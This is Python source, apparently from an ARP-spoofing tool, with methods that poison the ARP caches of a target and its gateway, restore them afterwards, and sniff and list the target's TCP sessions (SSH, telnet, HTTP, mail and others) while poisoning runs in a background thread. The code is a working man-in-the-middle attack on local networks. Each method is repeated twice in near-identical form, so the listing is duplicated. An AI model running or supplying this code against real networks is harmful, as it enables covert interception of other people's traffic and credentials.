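 def restore(self, delay, target_b=None):
     """Reset the ARP caches of the target(s) and the router (AP).

     Re-announces the genuine IP-to-MAC mappings on both sides of the
     previously poisoned pair so traffic stops transiting this host. Each
     pair of frames is repeated six times because ARP is unacknowledged and
     a single frame may be lost.

     Args:
         delay: kept for signature compatibility with callers; not used in
             this body.
         target_b: the second endpoint of the pair. Defaults to
             ``self.gateway`` when falsy.

     Side effects: opens a raw PF_PACKET socket bound to ``self.dev``
     (requires raw-socket privileges) and sends the frames produced by
     ``utils.build_arp_packet``. The socket is always closed on exit, which
     the previous version did not guarantee.

     Note: the argument order passed to ``utils.build_arp_packet`` is
     (mac, ip_a, ip_b); its exact field mapping is not visible here —
     confirm against the helper before changing the calls.
     """
     if not target_b:
         target_b = self.gateway
     source_mac = utils.get_mac_by_ip(target_b)
     sock = socket(PF_PACKET, SOCK_RAW)
     try:
         sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
         # A single target and a list of targets are handled by one loop;
         # the per-target packet pairs are identical in both cases.
         targets = self.target if isinstance(self.target, list) else [self.target]
         for addr in targets:
             target_mac = utils.get_mac_by_ip(addr)
             # range() works on both Python 2 and 3; xrange does not exist on 3.
             for _ in range(6):
                 # One frame towards the target about target_b ...
                 sock.send(str(utils.build_arp_packet(target_mac, target_b, addr)))
                 # ... and one towards target_b about the target.
                 sock.send(str(utils.build_arp_packet(source_mac, addr, target_b)))
     finally:
         # Close even if resolution or a send fails part-way through, so a
         # failed restore does not leak a privileged raw socket.
         sock.close()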
 def poison(self, delay, target_b=None):
     """Send one round of unsolicited ARP replies between the target(s) and target_b.

     Each endpoint receives an ARP reply (op=2, "is-at") claiming the other
     endpoint's IP; with scapy's default hwsrc this is the sending
     interface's MAC, so the two endpoints' ARP caches are rewritten to
     point at this host. ``restore`` re-announces the genuine mappings.

     Args:
         delay: not used in this body, although callers pass it.
         target_b: second endpoint; defaults to ``self.gateway`` when falsy.

     Note: only a single pair of replies per target is sent per call; ARP
     cache entries expire, so any lasting effect depends on the caller
     invoking this repeatedly.
     """
     if not target_b:
         target_b = self.gateway
     # self.src_mac is assumed to be 12 hex digits without separators; the
     # join reinserts ':' between every two characters — TODO confirm.
     src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
     if not isinstance(self.target, list):
         dst_mac = utils.get_mac_by_ip(self.target)
         # Reply to the target: "target_b is-at <our MAC>".
         send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst=dst_mac), verbose=False)
         # Reply to target_b: "target is-at <our MAC>".
         # NOTE(review): hwdst here is self.src_mac, whereas restore() uses
         # target_b's resolved MAC in the corresponding position — confirm
         # what self.src_mac is meant to hold.
         send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst=src_mac), verbose=False)
     else:
         # Same two replies, once per address in the target list.
         for addr in self.target:
             dst_mac = utils.get_mac_by_ip(addr)
             send(ARP(op=2, pdst=addr, psrc=target_b, hwdst=dst_mac), verbose=False)
             send(ARP(op=2, pdst=target_b, psrc=addr, hwdst=src_mac), verbose=False)
 def poison(self, delay, target_b=None):
     """Send one round of unsolicited ARP replies between the target(s) and target_b.

     Each endpoint receives an ARP reply (op=2, "is-at") claiming the other
     endpoint's IP; with scapy's default hwsrc this is the sending
     interface's MAC, so the two endpoints' ARP caches are rewritten to
     point at this host. ``restore`` re-announces the genuine mappings.

     Args:
         delay: not used in this body, although callers pass it.
         target_b: second endpoint; defaults to ``self.gateway`` when falsy.

     Note: only a single pair of replies per target is sent per call; ARP
     cache entries expire, so any lasting effect depends on the caller
     invoking this repeatedly.
     """
     if not target_b:
         target_b = self.gateway
     # self.src_mac is assumed to be 12 hex digits without separators; the
     # join reinserts ':' between every two characters — TODO confirm.
     src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
     if not isinstance(self.target, list):
         dst_mac = utils.get_mac_by_ip(self.target)
         # Reply to the target: "target_b is-at <our MAC>".
         send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst=dst_mac), verbose=False)
         # Reply to target_b: "target is-at <our MAC>".
         # NOTE(review): hwdst here is self.src_mac, whereas restore() uses
         # target_b's resolved MAC in the corresponding position — confirm
         # what self.src_mac is meant to hold.
         send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst=src_mac), verbose=False)
     else:
         # Same two replies, once per address in the target list.
         for addr in self.target:
             dst_mac = utils.get_mac_by_ip(addr)
             send(ARP(op=2, pdst=addr, psrc=target_b, hwdst=dst_mac), verbose=False)
             send(ARP(op=2, pdst=target_b, psrc=addr, hwdst=src_mac), verbose=False)
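 def restore(self, delay, target_b=None):
     """Reset the ARP caches of the target(s) and the router (AP).

     Re-announces the genuine IP-to-MAC mappings on both sides of the
     previously poisoned pair so traffic stops transiting this host. Each
     pair of frames is repeated six times because ARP is unacknowledged and
     a single frame may be lost.

     Args:
         delay: kept for signature compatibility with callers; not used in
             this body.
         target_b: the second endpoint of the pair. Defaults to
             ``self.gateway`` when falsy.

     Side effects: opens a raw PF_PACKET socket bound to ``self.dev``
     (requires raw-socket privileges) and sends the frames produced by
     ``utils.build_arp_packet``. The socket is always closed on exit, which
     the previous version did not guarantee.

     Note: the argument order passed to ``utils.build_arp_packet`` is
     (mac, ip_a, ip_b); its exact field mapping is not visible here —
     confirm against the helper before changing the calls.
     """
     if not target_b:
         target_b = self.gateway
     source_mac = utils.get_mac_by_ip(target_b)
     sock = socket(PF_PACKET, SOCK_RAW)
     try:
         sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
         # A single target and a list of targets are handled by one loop;
         # the per-target packet pairs are identical in both cases.
         targets = self.target if isinstance(self.target, list) else [self.target]
         for addr in targets:
             target_mac = utils.get_mac_by_ip(addr)
             # range() works on both Python 2 and 3; xrange does not exist on 3.
             for _ in range(6):
                 # One frame towards the target about target_b ...
                 sock.send(str(utils.build_arp_packet(target_mac, target_b, addr)))
                 # ... and one towards target_b about the target.
                 sock.send(str(utils.build_arp_packet(source_mac, addr, target_b)))
     finally:
         # Close even if resolution or a send fails part-way through, so a
         # failed restore does not leak a privileged raw socket.
         sock.close()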
    def list_sessions(self, stop, target_b=None, port=None):
        """
        Try to get all TCP sessions of the target.

        Starts ``self.poison`` in a daemon thread, then sniffs ``self.dev``
        with a BPF filter derived from the target(s) (and ``port`` when
        given) and prints every newly seen ``src:port <-> dst:port`` pair,
        labelled by well-known port where possible.

        Args:
            stop: zero-argument callable polled once per captured packet;
                a truthy result ends the capture loop.
            target_b: second endpoint of the pair; ``None`` means
                ``self.gateway`` (that default is applied inside ``poison``).
            port: optional port handed to ``_build_pcap_filter`` to narrow
                the capture.

        Side effects: appends each new session key to ``self.sessions``.
        On KeyboardInterrupt it calls ``restore`` and disables IP
        forwarding; when ``stop()`` ends the loop instead, neither happens
        here — presumably the caller handles cleanup on that path; confirm.
        """
        # Port -> label used to tag a session. The source port is checked
        # before the destination port, so the first match wins.
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'
        }

        # 'source' is only used in the banner below. NOTE(review): one branch
        # takes it from get_default_gateway_linux() and the other from
        # get_mac_by_ip(); confirm both return the same kind of value
        # (address vs MAC), otherwise the banner is inconsistent.
        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        # BPF expression; presumably built around self.target — see
        # _build_pcap_filter.
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)  # restrict the capture to the target's IP traffic
        # Background thread running self.poison(2, target_b). The thread is a
        # daemon so it dies with the process. NOTE(review): the poison()
        # shown elsewhere in this listing sends a single round and ignores
        # its delay argument; confirm whether it is expected to loop.
        poison_thread = Thread(target=self.poison, args=(
            2,
            target_b,
        ))
        poison_thread.daemon = True
        poison_thread.start()
        # G/W/R are presumably ANSI colour constants defined at module level.
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              source + W + ' and ' + R + (','.join(self.target) if isinstance(
                  self.target, list) else self.target) + W + '\n')
        # session key -> label; keys are directional, so the reverse direction
        # of the same connection is a separate entry.
        sessions = {}
        try:
            for _, pkt in packets:
                if stop():
                    break
                eth = dpkt.ethernet.Ethernet(pkt)
                # The "ip host" filter should leave only IP frames, so
                # eth.data is expected to be dpkt.ip.IP; a non-IP frame would
                # raise AttributeError on .p here.
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    # Skips only segments whose flag field is exactly RST;
                    # e.g. RST|ACK still passes this comparison.
                    if tcp.flags != dpkt.tcp.TH_RST:
                        sess = "%-25s <-> %25s" % (
                            inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
                            inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
                        # First sighting of this key -> print and record it.
                        check = False
                        if sess not in sessions:
                            check = True

                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        if check is True:
                            # Running count of distinct keys, the key, its label.
                            print(" [{:^5}] {} : {}".format(
                                len(sessions), sess, sessions[sess]))
                            self.sessions.append(sess)

        except KeyboardInterrupt:
            # Ctrl-C: put the ARP caches back and stop forwarding.
            print('[+] Session scan interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
    def list_sessions(self, stop, target_b=None, port=None):
        """
        Try to get all TCP sessions of the target.

        Starts ``self.poison`` in a daemon thread, then sniffs ``self.dev``
        with a BPF filter derived from the target(s) (and ``port`` when
        given) and prints every newly seen ``src:port <-> dst:port`` pair,
        labelled by well-known port where possible.

        Args:
            stop: zero-argument callable polled once per captured packet;
                a truthy result ends the capture loop.
            target_b: second endpoint of the pair; ``None`` means
                ``self.gateway`` (that default is applied inside ``poison``).
            port: optional port handed to ``_build_pcap_filter`` to narrow
                the capture.

        Side effects: appends each new session key to ``self.sessions``.
        On KeyboardInterrupt it calls ``restore`` and disables IP
        forwarding; when ``stop()`` ends the loop instead, neither happens
        here — presumably the caller handles cleanup on that path; confirm.
        """
        # Port -> label used to tag a session. The source port is checked
        # before the destination port, so the first match wins.
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'
        }

        # 'source' is only used in the banner below. NOTE(review): one branch
        # takes it from get_default_gateway_linux() and the other from
        # get_mac_by_ip(); confirm both return the same kind of value
        # (address vs MAC), otherwise the banner is inconsistent.
        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        # BPF expression; presumably built around self.target — see
        # _build_pcap_filter.
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter) # restrict the capture to the target's IP traffic
        # Background thread running self.poison(2, target_b). The thread is a
        # daemon so it dies with the process. NOTE(review): the poison()
        # shown elsewhere in this listing sends a single round and ignores
        # its delay argument; confirm whether it is expected to loop.
        poison_thread = Thread(target=self.poison, args=(2, target_b, ))
        poison_thread.daemon = True
        poison_thread.start()
        # G/W/R are presumably ANSI colour constants defined at module level.
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        # session key -> label; keys are directional, so the reverse direction
        # of the same connection is a separate entry.
        sessions = {}
        try:
            for _, pkt in packets:
                if stop():
                    break
                eth = dpkt.ethernet.Ethernet(pkt)
                # The "ip host" filter should leave only IP frames, so
                # eth.data is expected to be dpkt.ip.IP; a non-IP frame would
                # raise AttributeError on .p here.
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    # Skips only segments whose flag field is exactly RST;
                    # e.g. RST|ACK still passes this comparison.
                    if tcp.flags != dpkt.tcp.TH_RST:
                        sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":"
                                                   + str(tcp.sport), inet_ntoa(ip_packet.dst) + ":"
                                                   + str(tcp.dport))
                        # First sighting of this key -> print and record it.
                        check = False
                        if sess not in sessions:
                            check = True

                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        if check is True:
                            # Running count of distinct keys, the key, its label.
                            print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
                            self.sessions.append(sess)

        except KeyboardInterrupt:
            # Ctrl-C: put the ARP caches back and stop forwarding.
            print('[+] Session scan interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)